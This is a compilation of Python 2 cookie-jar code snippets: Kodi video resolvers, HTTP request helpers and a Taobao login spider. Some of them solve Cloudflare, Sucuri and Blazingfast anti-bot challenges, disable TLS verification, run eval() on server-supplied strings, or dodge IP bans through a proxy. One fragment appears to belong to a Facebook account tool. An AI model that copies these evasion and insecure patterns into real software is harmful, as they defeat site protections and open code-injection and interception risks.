     return cl.LWPCookieJar()
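A sketch of the context this one-liner implies; the `cl` alias is an assumption from `import cookielib as cl`:

import cookielib as cl  # assumed alias
import urllib2

jar = cl.LWPCookieJar()  # what get_empty_cookiejar() returns
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))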
Example #16
def loadVideos(url, name):
    #try:
    newlink = url
    xbmc.executebuiltin(
        "XBMC.Notification(Please Wait!,Loading selected video)")
    print newlink
    playtype = "direct"
    if (newlink.find("dailymotion") > -1):
        match = re.compile(
            '(dailymotion\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)'
        ).findall(newlink)
        lastmatch = match[0][-1]
        link = 'http://www.dailymotion.com/' + str(lastmatch)
        req = urllib2.Request(link)
        req.add_header(
            'User-Agent',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
        )
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        sequence = re.compile('"sequence",  "(.+?)"').findall(link)
        newseqeunce = urllib.unquote(sequence[0]).decode('utf8').replace(
            '\\/', '/')
        #print 'in dailymontion:' + str(newseqeunce)
        imgSrc = re.compile('"videoPreviewURL":"(.+?)"').findall(newseqeunce)
        if (len(imgSrc) == 0 or len(imgSrc[0]) == 0):  # guard: findall may return nothing
            imgSrc = re.compile('/jpeg" href="(.+?)"').findall(link)
        dm_low = re.compile('"sdURL":"(.+?)"').findall(newseqeunce)
        dm_high = re.compile('"hqURL":"(.+?)"').findall(newseqeunce)
        vidlink = urllib2.unquote(dm_low[0]).decode("utf8")
    elif (newlink.find("4shared") > -1):
        d = xbmcgui.Dialog()
        d.ok('Not Implemented', 'Sorry 4Shared links', ' not implemented yet')
    elif (newlink.find("docs.google.com") > -1
          or newlink.find("drive.google.com") > -1):
        docid = re.compile('/d/(.+?)/preview').findall(newlink)[0]
        cj = cookielib.LWPCookieJar()
        (cj, vidcontent) = GetContent2(
            "https://docs.google.com/get_video_info?docid=" + docid, "", cj)
        html = urllib2.unquote(vidcontent)
        cookiestr = ""
        try:
            html = html.encode("utf-8", "ignore")
        except:
            pass
        stream_map = re.compile('fmt_stream_map=(.+?)&fmt_list').findall(html)
        if (len(stream_map) > 0):
            formatArray = stream_map[0].replace("\/", "/").split(',')
            for formatContent in formatArray:
                formatContentInfo = formatContent.split('|')
                qual = formatContentInfo[0]
                url = (formatContentInfo[1]).decode('unicode-escape')

        else:
            cj = cookielib.LWPCookieJar()
            newlink1 = "https://docs.google.com/uc?export=download&id=" + docid
            (cj, vidcontent) = GetContent2(newlink1, newlink, cj)
            soup = BeautifulSoup(vidcontent)
            downloadlink = soup.findAll('a', {"id": "uc-download-link"})[0]
            newlink2 = "https://docs.google.com" + downloadlink["href"]
            url = GetDirVideoUrl(newlink2, cj)
        for cookie in cj:
            cookiestr += '%s=%s;' % (cookie.name, cookie.value)
        vidlink = url + ('|Cookie=%s' % cookiestr)
    elif (newlink.find("vimeo") > -1):
        idmatch = re.compile(
            "http://player.vimeo.com/video/([^\?&\"\'>]+)").findall(newlink)
        if (len(idmatch) > 0):
            playVideo('vimeo', idmatch[0])
    elif (newlink.find("youtube") > -1) and (newlink.find("playlists") > -1):
        playlistid = re.compile('playlists/(.+?)\?v').findall(newlink)
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("list=") > -1):
        playlistid = re.compile('videoseries\?list=(.+?)&').findall(newlink +
                                                                    "&")
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("/p/") > -1):
        playlistid = re.compile('/p/(.+?)\?').findall(newlink)
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("/embed/") > -1):
        playlistid = re.compile('/embed/(.+?)\?').findall(newlink + "?")
        vidlink = getYoutube(playlistid[0])
    elif (newlink.find("youtube") > -1):
        match = re.compile(
            '(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)'
        ).findall(newlink)
        if (len(match) == 0):
            match = re.compile(
                'http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink)
        if (len(match) > 0):
            lastmatch = match[0][-1].replace('v/', '')
        print "in youtube" + lastmatch[0]
        vidlink = lastmatch
        playtype = "youtube"
    else:
        sources = []
        label = name
        hosted_media = urlresolver.HostedMediaFile(url=newlink, title=label)
        sources.append(hosted_media)
        source = urlresolver.choose_source(sources)
        print "inresolver=" + newlink
        if source:
            vidlink = source.resolve()
        else:
            vidlink = ""
    playVideo(playtype, vidlink)
Example #17
 def createCookieJarHandler(self):
     """
     Create cookie jar handler. used when keep cookie at login.
     """
     cookieJar = cookielib.LWPCookieJar()
     return urllib2.HTTPCookieProcessor(cookieJar)
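A usage sketch (hedged; assumed to run inside another method of the same class):

def login(self, url):
    opener = urllib2.build_opener(self.createCookieJarHandler())
    return opener.open(url)  # cookies set by the server are retained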
Example #18
def keluar():
    # Indonesian: "exit" -- save state, print a message, and quit
    simpan()
    tampil('\rm[!]Keluar')
    os.sys.exit()


log = 0
id_bteman = []
id_bgroup = []
fid_bteman = []
fid_bgroup = []
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_cookiejar(cookielib.LWPCookieJar())
br.set_handle_redirect(True)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [(
    'User-Agent',
    'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16'
)]


def bacaData():
    global fid_bgroup, fid_bteman
    try:
        fid_bgroup = open(os.sys.path[0] + '/MBFbgroup.txt', 'r').readlines()
    except:
        pass
    try:
Example #19
import cookielib
import urllib2

cookiejar = cookielib.LWPCookieJar()
http_handler = urllib2.HTTPHandler(debuglevel=1)
opener = urllib2.build_opener(http_handler,
                              urllib2.HTTPCookieProcessor(cookiejar))
urllib2.install_opener(opener)
#url = 'https://www.orange.sk/'
url = 'https://www.idcourts.us/repository/start.do'
req = urllib2.Request(url, None)
s = opener.open(req)  # the jar stays empty until a request has been made
cookie = next(iter(cookiejar))  # CookieJar is iterable, not indexable
print cookie.value
"""
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/partySearch.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/start.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/partySearch.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
"""
Example #20
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30'):
    try:
        if not url:
            return

        handlers = []

        if not proxy == None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)  # install_opener returns None

        if output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)  # install_opener returns None

        try:
            import platform
            node = platform.node().lower()
        except:
            node = ''

        if (2, 7, 8) < sys.version_info < (2, 7, 12) or node == 'xboxone':
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                urllib2.install_opener(opener)  # install_opener returns None
            except:
                pass

        if url.startswith('//'): url = 'http:' + url

        _headers = {}
        try:
            _headers.update(headers)
        except:
            pass
        if 'User-Agent' in _headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            _headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            _headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in _headers:
            pass
        elif referer is not None:
            _headers['Referer'] = referer
        if not 'Accept-Language' in _headers:
            _headers['Accept-Language'] = 'en-US'
        if 'X-Requested-With' in _headers:
            pass
        elif XHR == True:
            _headers['X-Requested-With'] = 'XMLHttpRequest'
        if 'Cookie' in _headers:
            pass
        elif not cookie == None:
            _headers['Cookie'] = cookie
        if 'Accept-Encoding' in _headers:
            pass
        elif compression and limit is None:
            _headers['Accept-Encoding'] = 'gzip'

        if redirect == False:

            #old implementation
            #class NoRedirection(urllib2.HTTPErrorProcessor):
            #    def http_response(self, request, response): return response

            #opener = urllib2.build_opener(NoRedirection)
            #opener = urllib2.install_opener(opener)

            class NoRedirectHandler(urllib2.HTTPRedirectHandler):
                def http_error_302(self, req, fp, code, msg, headers):
                    infourl = urllib.addinfourl(fp, headers,
                                                req.get_full_url())
                    infourl.status = code
                    infourl.code = code
                    return infourl

                http_error_300 = http_error_302
                http_error_301 = http_error_302
                http_error_303 = http_error_302
                http_error_307 = http_error_302

            opener = urllib2.build_opener(NoRedirectHandler())
            urllib2.install_opener(opener)

            try:
                del _headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            post = utils.byteify(post)
            post = urllib.urlencode(post)

        url = utils.byteify(url)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, _headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                cf_result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    cf_result = gzip.GzipFile(
                        fileobj=StringIO.StringIO(cf_result)).read()

                if 'cf-browser-verification' in cf_result:

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                          urlparse.urlparse(url).netloc)

                    if not netloc.endswith('/'): netloc += '/'

                    ua = _headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    _headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post)
                    _add_request_header(request, _headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error == False: return
            else:
                log_utils.log(
                    'Request-Error (%s): %s' % (str(response.code), url),
                    log_utils.LOGDEBUG)
                if error == False: return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result

        elif output == 'file_size':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = '0'
            response.close()
            return content

        if limit == '0':
            result = response.read(224 * 1024)
        elif not limit == None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None
        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            _headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, _headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(
                    fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                  urlparse.urlparse(url).netloc)
            ua = _headers['User-Agent']
            _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                           timeout)

            result = _basic_request(url,
                                    headers=_headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers
            response_code = str(response.code)
            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                cookie = cf
            except:
                pass
            if close == True: response.close()
            return (result, response_code, response_headers, _headers, cookie)
        else:
            if close == True: response.close()
            return result
    except Exception as e:
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
        return
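A few usage sketches for the output modes handled above (URL hypothetical):

html = request('http://example.com/page')  # plain page body
cookie = request('http://example.com/page', output='cookie')  # cookie string
body, code, resp_headers, req_headers, cookie = request(
    'http://example.com/page', output='extended')  # five-element tuple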
Example #21
COOKIEFILE = 'cookies.lwp'  # the path and filename that you want to use to save your cookies in
import os.path

cj = None
ClientCookie = None
cookielib = None

try:  # Let's see if cookielib is available
    import cookielib
except ImportError:
    pass
else:
    import urllib2
    urlopen = urllib2.urlopen
    cj = cookielib.LWPCookieJar()  # a FileCookieJar subclass with useful load and save methods
    Request = urllib2.Request

if not cookielib:  # If importing cookielib fails let's try ClientCookie
    try:
        import ClientCookie
    except ImportError:
        import urllib2
        urlopen = urllib2.urlopen
        Request = urllib2.Request
    else:
        urlopen = ClientCookie.urlopen
        cj = ClientCookie.LWPCookieJar()
        Request = ClientCookie.Request
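Whichever import succeeded, `cj`, `urlopen`, and `Request` now present one interface; a sketch (an assumption, not the original) of the usual next step:

if cj is not None and os.path.isfile(COOKIEFILE):
    cj.load(COOKIEFILE)  # both jar flavours accept the filename here
if cookielib is not None and cj is not None:
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)  # plain urlopen() calls now carry cookies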

####################################################
Example #22
 def __init__(self):
     # Login URL
     self.loginURL = "https://login.taobao.com/member/login.jhtml"
     # Proxy address, to keep our own IP from getting banned
     self.proxyURL = 'http://120.193.146.97:843'
     # Headers sent when POSTing the login data
     self.loginHeaders = {
         'Host': 'login.taobao.com',
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0',
         'Referer': 'https://login.taobao.com/member/login.jhtml',
         'Content-Type': 'application/x-www-form-urlencoded',
         'Connection': 'Keep-Alive'
     }
     # Username
     self.username = '******'
     # The "ua" string, computed by Taobao's UA algorithm; it encodes the timestamp, browser, screen resolution, random numbers, and mouse/keyboard activity records
     self.ua = '208UW5TcyMNYQwiAiwTR3tCf0J/QnhEcUpkMmQ=|Um5Ockt1TnRMdE91QXVMeC4=|U2xMHDJ+H2QJZwBxX39Rb1p0VHo9VD8RRxE=|VGhXd1llXGJZY1tjWGJWY1doX2JAfEl0THZKdUB4QH5BeUZ6RHpUAg==|VWldfS0RMQ04ADUVKRAwHnENaAVjHmQ0UW5KYSZLZTNl|VmNDbUMV|V2NDbUMV|WGRYeCgGZhtmH2VScVI2UT5fORtmD2gCawwuRSJHZAFsCWMOdVYyVTpbPR99HWAFYVMoRSlIM141SBZPCTlZJFkgCTYOMHtSbVVqJg8wCDd7BXsFJ1ozVD5XMBJ5HntSbVVqJggoBih+KA==|WWdHFysWKQk0FCgRLhY2AzkCIh4nHiMDNwo3FysSKxY2AzwAVgA=|WmBAED4QMAwsECoTRRM=|W2FBET8RMQwsEikWLXst|XGREFDplPngsVTxGPEIlXjJmWnRUBDAJNRUrFSp8XGFBb0FhXWNXaVBlM2U=|XWdHFzkXNwsrFykdIxsidCI=|XmREFDplPngsVTxGPEIlXjJmWnRUaEh0Sn5AeE0bTQ==|X2dHFzkXN2dTblNzTXdJHz8CIgwiAj4HOQw1C10L|QHpaCiR7IGYySyJYIlw7QCx4RGpKd1drUmxZYFQCVA==|QXtbCyVlMXgfcx5dO0I+Qxd2WHhEZFhhX2tQbTtt|QnpaCiQKKnpOc05uUGVZDy8SMhwyEi4XLhcqFUMV|Q3lZCSdnM3odcRxfOUA8QRV0WnpHZ1tiW2JfZDJk|RH5eDiBgNH0adhtYPkc7RhJzXX1BYV1kXWVabjhu|RX5eDiBgNH0adhtYPkc7RhJzXX1BelpnR3tCekdzThhO|Rn1dDSNjN34ZdRhbPUQ4RRFwXn5EfV1kRHhBeUd/RhBG|R3xcDCJiNn8YdBlaPEU5RBBxX39Ff19iQn5Hf0pzTBpM|SHNTAy1tOXAXexZVM0o2Sx9+UHBFf19iQn5HfEB5QhRC|SXJSAixsOHEWehdUMks3Sh5/UXFJdVVoSHRNdk1xTRtN|SnFRAS9vO3IVeRRXMUg0SR18UnJHZ1p6Rn9FeUJ9K30=|S3BQAC5uOnMUeBVWMEk1SBx9U3NLdlZrS3dOdEtxSB5I|THRUBCpqPmYacBV0CVEsRThZMhw8bFhlXX1EcU4YOAUlCyUFOQA0CDQKXAo=|TXdXBylpPXQTfxJRN04yTxt6VHRJaVVsWGRYbTtt|TndKd1dqSnVVaVBsTHJKcFBoXHxGfl5iXmdHe1tiX39BdVVpUHBOdFRqUXFNcVFvVnZIdlZjQ31BYV9iQn5FZVlhQX1EZFhmRnpFZVllRXlEZEV6WmVZDw=='
     # Password -- not the real one: Taobao encrypts it (256 bits), and this is the encrypted form
     self.password2 = '80559e9bbe990b2f09f2644d109865bef7de942b5117c7c2684aa31881460c81af5d11d571147111fa7a201746dba3f2d7373f05a0a8134e20e6abfab922c3c5722e8f5978ecf8a57612ef2842a758398960534cbee31121fc9a3483d1c3a64c5f3f97c6ff0f9652a96c9d8564c4cfb31fb6fd328e1feb76b97010319785f707'
     self.post = {
         'ua': self.ua,
         'TPL_checkcode': '',
         'CtrlVersion': '1,0,0,7',
         'TPL_password': '',
         'TPL_redirect_url':
         'http://i.taobao.com/my_taobao.htm?nekot=udm8087E1424147022443',
         'TPL_username': self.username,
         'loginsite': '0',
         'newlogin': '******',
         'from': 'tb',
         'fc': 'default',
         'style': 'default',
         'css_style': '',
         'tid':
         'XOR_1_000000000000000000000000000000_625C4720470A0A050976770A',
         'support': '000001',
         'loginType': '4',
         'minititle': '',
         'minipara': '',
         'umto': 'NaN',
         'pstrong': '3',
         'llnick': '',
         'sign': '',
         'need_sign': '',
         'isIgnore': '',
         'full_redirect': '',
         'popid': '',
         'callback': '',
         'guf': '',
         'not_duplite_str': '',
         'need_user_id': '',
         'poy': '',
         'gvfdcname': '10',
         'gvfdcre': '',
         'from_encoding ': '',
         'sub': '',
         'TPL_password_2': self.password2,
         'loginASR': '1',
         'loginASRSuc': '1',
         'allp': '',
         'oslanguage': 'zh-CN',
         'sr': '1366*768',
         'osVer': 'windows|6.1',
         'naviVer': 'firefox|35'
     }
     # URL-encode the POST data
     self.postData = urllib.urlencode(self.post)
     # Set up the proxy
     self.proxy = urllib2.ProxyHandler({'http': self.proxyURL})
     # Set up the cookie jar
     self.cookie = cookielib.LWPCookieJar()
     # Set up the cookie processor
     self.cookieHandler = urllib2.HTTPCookieProcessor(self.cookie)
     # Build the opener used for logging in; its open() behaves like urllib2.urlopen
     self.opener = urllib2.build_opener(self.cookieHandler, self.proxy,
                                        urllib2.HTTPHandler)
     # Placeholder for J_HToken
     self.J_HToken = ''
     # Cookie jar needed once login succeeds
     self.newCookie = cookielib.CookieJar()
     # A fresh opener needed once login succeeds
     self.newOpener = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(self.newCookie))
     # Helper/tool class
     self.tool = Spider5_tool.Tool()
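A hedged sketch of how the fields above would come together to submit the login; the method name and the GBK decoding are assumptions, since the rest of the class is not shown:

 def login(self):
     # POST the prepared form through the cookie- and proxy-aware opener.
     request = urllib2.Request(self.loginURL, self.postData, self.loginHeaders)
     response = self.opener.open(request)
     return response.read().decode('gbk')  # Taobao pages of this era were GBK-encoded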
Example #23
 def clear_cookies(self):
     self.cookie_jar = cookielib.LWPCookieJar()
     self.set_cookiejar(self.cookie_jar)
Example #24
 def addCookie(self, cookie):
     global defaultCookieJar
     if defaultCookieJar is None:
         defaultCookieJar = cookielib.LWPCookieJar()
     defaultCookieJar.set_cookie(cookie)
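Constructing a cookielib.Cookie for set_cookie() takes the full field list; a hedged sketch with purely illustrative values:

c = cookielib.Cookie(version=0, name='session', value='abc123', port=None,
                     port_specified=False, domain='example.com',
                     domain_specified=True, domain_initial_dot=False,
                     path='/', path_specified=True, secure=False, expires=None,
                     discard=True, comment=None, comment_url=None, rest={})
spider.addCookie(c)  # 'spider' is hypothetical; any object exposing addCookie works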
Example #25
def cfcookie(netloc, ua, timeout):
    try:
        headers = {'User-Agent': ua}

        req = urllib2.Request(netloc, headers=headers)

        # Cloudflare serves the challenge page as an HTTP error (typically 503),
        # so the body is read in the except branch.
        try:
            urllib2.urlopen(req, timeout=int(timeout))
        except urllib2.HTTPError as response:
            result = response.read(5242880)

        jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]

        init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                          result)[-1]

        builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]

        decryptVal = parseJSString(init)

        lines = builder.split(';')

        for line in lines:

            if len(line) > 0 and '=' in line:

                sections = line.split('=')
                line_val = parseJSString(sections[1])
                decryptVal = int(
                    eval(
                        str(decryptVal) + str(sections[0][-1]) +
                        str(line_val)))

        answer = decryptVal + len(urlparse.urlparse(netloc).netloc)

        query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
            netloc, jschl, answer)

        if 'type="hidden" name="pass"' in result:
            passval = re.findall('name="pass" value="(.*?)"', result)[0]
            query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                netloc, quote_plus(passval), jschl, answer)
            time.sleep(5)

        cookies = cookielib.LWPCookieJar()
        handlers = [
            urllib2.HTTPHandler(),
            urllib2.HTTPSHandler(),
            urllib2.HTTPCookieProcessor(cookies)
        ]
        opener = urllib2.build_opener(*handlers)
        urllib2.install_opener(opener)

        try:
            req = urllib2.Request(query, headers=headers)
            urllib2.urlopen(req, timeout=int(timeout))
        except BaseException:
            pass

        cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

        return cookie
    except BaseException:
        pass
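Both this example and Example #28 call parseJSString() without defining it. A hedged sketch of the missing helper, assuming the Cloudflare IUAM obfuscation of the era (arithmetic spelled with !, +, [] and parentheses); note the final answer above additionally adds the length of the bare domain name:

def parseJSString(s):
    # Translate the JS idioms into Python, then evaluate the arithmetic.
    try:
        offset = 1 if s[0] == '+' else 0
        val = int(eval(s.replace('!+[]', '1').replace('!![]', '1')
                        .replace('[]', '0').replace('(', 'str(')[offset:]))
        return val
    except:
        pass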
Example #26
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30',
            ignoreSsl=False,
            flare=True,
            ignoreErrors=None):
    try:
        if url is None:
            return None

        handlers = []

        if proxy is not None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie' or output == 'extended' or close is not True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)):
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'):
            url = 'http:' + url

        # Fall back to an empty dict when no (valid) headers were passed in.
        if not isinstance(headers, dict):
            headers = {}

        if 'User-Agent' in headers:
            pass
        elif mobile is not True:
            # headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'

        if 'Referer' in headers:
            pass
        elif referer is not None:
            headers['Referer'] = referer

        if 'Accept-Language' not in headers:
            headers['Accept-Language'] = 'en-US'

        if 'X-Requested-With' in headers:
            pass
        elif XHR is True:
            headers['X-Requested-With'] = 'XMLHttpRequest'

        if 'Cookie' in headers:
            pass
        elif cookie is not None:
            headers['Cookie'] = cookie

        if 'Accept-Encoding' in headers:
            pass
        elif compression and limit is None:
            headers['Accept-Encoding'] = 'gzip'

        if redirect is False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128)
            for key, value in post.iteritems():
                try:
                    post[key] = value.encode('utf-8')
                except:
                    pass

            post = urlencode(post)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            try:
                ignore = ignoreErrors and (int(response.code) == ignoreErrors
                                           or int(
                                               response.code) in ignoreErrors)
            except:
                ignore = False

            if not ignore:
                if response.code in [301, 307, 308, 503]:
                    cf_result = response.read(5242880)

                    try:
                        encoding = response.info().getheader(
                            'Content-Encoding')
                    except:
                        encoding = None

                    if encoding == 'gzip':
                        cf_result = gzip.GzipFile(
                            fileobj=StringIO(cf_result)).read()

                    if flare and 'cloudflare' in str(response.info()).lower():
                        try:
                            from openscrapers.modules import cfscrape
                            if isinstance(post, dict):
                                data = post
                            else:
                                try:
                                    data = parse_qs(post)
                                except:
                                    data = None

                            scraper = cfscrape.CloudScraper()
                            response = scraper.request(
                                method='GET' if post is None else 'POST',
                                url=url,
                                headers=headers,
                                data=data,
                                timeout=int(timeout))
                            result = response.content
                            flare = 'cloudflare'  # Used below
                            try:
                                cookies = response.request._cookies
                            except:
                                log_utils.error()
                        except:
                            log_utils.error()

                    elif 'cf-browser-verification' in cf_result:
                        netloc = '%s://%s' % (urlparse(url).scheme,
                                              urlparse(url).netloc)
                        ua = headers['User-Agent']
                        cf = cache.get(cfcookie().get, 168, netloc, ua,
                                       timeout)
                        headers['Cookie'] = cf
                        request = urllib2.Request(url, data=post)
                        _add_request_header(request, headers)
                        response = urllib2.urlopen(request,
                                                   timeout=int(timeout))
                    else:
                        log_utils.log(
                            'Request-Error (%s): %s' %
                            (str(response.code), url), log_utils.LOGDEBUG)
                        if error is False:
                            return None
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error is False:
                        return None

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

            if close is True:
                response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close is True:
                response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close is True:
                response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024):
                return
            result = response.read(16 * 1024)
            if close is True:
                response.close()
            return result

        if flare != 'cloudflare':
            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None

        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(fileobj=StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse(url).scheme, urlparse(url).netloc)
            ua = headers['User-Agent']
            headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                          timeout)
            result = _basic_request(url,
                                    headers=headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers

            try:
                response_code = str(response.code)
            except:
                response_code = str(response.status_code)  # CFScrape/Requests response object

            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass

            try:
                cookie = cf
            except:
                pass

            if close is True:
                response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close is True:
                response.close()
            return result

    except Exception as e:
        # log_utils.error()
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
